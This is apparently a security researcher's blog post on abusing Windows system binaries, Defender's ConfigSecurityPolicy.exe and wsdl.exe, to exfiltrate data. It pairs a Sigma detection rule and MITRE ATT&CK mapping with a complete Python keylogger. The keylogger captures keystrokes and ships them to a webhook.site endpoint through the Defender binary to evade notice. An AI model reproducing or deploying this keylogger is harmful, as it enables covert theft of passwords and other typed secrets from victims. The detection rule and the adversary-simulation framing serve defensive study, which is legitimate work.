Data Exfiltration with LOLBins

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can check a lof of tricks on “https://github.com/LOLBAS-Project/LOLBAS” — Living Off The Land Binaries And Scripts — (LOLBins and LOLScripts).

My first discover was a simple way to abuse Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9–0\ConfigSecurityPolicy.exe”] to exfil data:

ConfigSecurityPolicy.exe

Looking for a little more, I found another way with wsdl.exe (Microsoft Web Services Description Language Utility), The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which enables you to generate a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:

wsdl.exe

Blueteam/Redteam tips:

  • UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
  • A simple sigma rule to help possible insider threat:
logsource:
product: windows
category: process_creation
detection
selection:
Image: '*\ConfigSecurityPolicy.exe'
mandatory_cmdline:
Commandline|all:
- '*ConfigSecurityPolicy.exe*'
- '*.xml'
condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins

A piece of code to help readteam usage(thanks Neriberto Prado ❤), a simple keylogger abusing Windows Defender to exfil logs:

# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)
print(f'last key: {str(key)}')
print("")
if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''
if key == 0x03:
sys.exit(0)
if __name__ == "__main__":
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
Proof of Concept

MITRE ATT&CK Techniques:

  • ID: T1105
  • Sub-techniques: No sub-techniques
  • Tactic: Command And Control
  • Platforms: Linux, Windows, macOS
  • Permissions Required: User
  • Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, a simple and effective way to simulate possible tactics of your opponents, soon I will come back with more tips.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
movq %rax,%rax

movq %rax,%rax

105 Followers

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\